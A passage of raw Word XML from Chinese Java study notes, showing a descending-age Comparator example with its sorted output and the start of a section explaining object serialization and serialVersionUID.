          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>比较器</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve"> *       </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>它是</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>“Person</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>age</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的升序比较器</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t> */</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>private static class DescAgeComparator implements Comparator&lt;Person&gt; {</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>    @Override</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>    public int compare(Person p1, Person p2) {</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        return p2.getAge() - p1.getAge();</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>    }</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008227AA" w:rsidRPr="008227AA" w:rsidRDefault="008227AA" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">f) </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>运行结果</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>运行程序，输出如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008227AA" w:rsidRPr="008227AA" w:rsidRDefault="008227AA" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F6FB"/>
        <w:spacing w:line="290" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>复制代码</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>代码如下</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008227AA" w:rsidRPr="008227AA" w:rsidRDefault="008227AA" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="DDEDFB"/>
        <w:spacing w:line="290" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>Original  sort, list:[ccc - 20, AAA - 30, bbb - 10, ddd - 40]</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>Name      sort, list:[AAA - 30, bbb - 10, ccc - 20, ddd - 40]</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>Asc(age)  sort, list:[bbb - 10, ccc - 20, AAA - 30, ddd - 40]</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>Desc(age) sort, list:[ddd - 40, AAA - 30, ccc - 20, bbb - 10]</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>eee - 100 EQUAL eee - 100</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008227AA" w:rsidRPr="00F41A4C" w:rsidRDefault="008227AA" w:rsidP="00903CE4">
      <w:pPr>
        <w:ind w:firstLineChars="250" w:firstLine="525"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00115125" w:rsidRPr="00F41A4C" w:rsidRDefault="0087699E" w:rsidP="00115125">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00115125" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00115125" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>序列化问题</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F75154" w:rsidRPr="00F75154" w:rsidRDefault="00F75154" w:rsidP="00F75154">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1.12.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>序列化问题</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115125" w:rsidRPr="00F41A4C" w:rsidRDefault="00115125" w:rsidP="00115125">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>把对象转换为字节序列的过程称为对象的序列化</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115125" w:rsidRPr="00F41A4C" w:rsidRDefault="00115125" w:rsidP="00115125">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>把字节序列恢复为对象的过程称为对象的反序列化</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115125" w:rsidRPr="00F41A4C" w:rsidRDefault="00115125" w:rsidP="00115125">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>对象的序列化主要有两种用途：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115125" w:rsidRPr="00F41A4C" w:rsidRDefault="00115125" w:rsidP="00115125">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>把对象的字节序列永久地保存到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="keywordlink"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>硬盘</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>上，通常存放在一个文件中；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115125" w:rsidRPr="00F41A4C" w:rsidRDefault="00115125" w:rsidP="00115125">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在网络上传送对象的字节序列。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115125" w:rsidRPr="00F41A4C" w:rsidRDefault="00115125" w:rsidP="00115125">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00115125" w:rsidRPr="00F41A4C" w:rsidRDefault="00115125" w:rsidP="007D70EF">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Serializable</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>接口：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115125" w:rsidRPr="00F41A4C" w:rsidRDefault="00115125" w:rsidP="00115125">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00115125" w:rsidRPr="00F41A4C" w:rsidRDefault="00115125" w:rsidP="00115125">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="916"/>
          <w:tab w:val="left" w:pos="435"/>
        </w:tabs>
        <w:spacing w:line="312" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">serialVersionUID </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>serialVersionUID</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>适用于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的序列化机制。简单来说，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的序列化机制是通过判断类的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>serialVersionUID</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>验证版本一致性</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的。在进行反序列化时，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>会把传来的字节流中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>serialVersionUID</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>与本地相应实体类的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
